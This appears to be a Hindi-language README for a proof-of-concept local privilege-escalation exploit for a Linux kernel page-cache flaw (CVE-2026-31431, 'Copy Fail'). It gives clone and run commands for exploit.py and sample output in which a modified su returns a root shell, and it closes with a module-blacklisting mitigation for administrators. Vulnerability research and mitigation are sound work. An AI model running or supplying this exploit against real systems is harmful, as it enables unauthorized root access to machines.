
CVE-2026-31431 - Linux कर्नेल पेज कैश भेद्यता
यह परियोजना केवल निम्नलिखित उद्देश्यों के लिए प्रदान की गई है:
लेखक और योगदानकर्ता इस सॉफ़्टवेयर के दुरुपयोग, क्षति, डेटा हानि, सेवा व्यवधान या किसी भी अवैध गतिविधियों के लिए जिम्मेदार नहीं हैं।
CVE-2026-31431 के लिए प्रूफ-ऑफ-कॉन्सेप्ट अनुसंधान उपकरण, जिसे "Copy Fail" (कॉपी विफलता) के रूप में भी जाना जाता है, यह Linux कर्नेल में algif_aead / authencesn AEAD कार्यान्वयन को प्रभावित करने वाली एक भेद्यता है।
यह भेद्यता विशिष्ट परिस्थितियों में पेज कैश भ्रष्टाचार का कारण बन सकती है, जो संभावित रूप से कमजोर प्रणालियों पर स्थानीय विशेषाधिकार वृद्धि का कारण बन सकती है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
जब पूछा जाए:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
यदि आप सिस्टम प्रशासक हैं और जोखिम को कम करना चाहते हैं:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null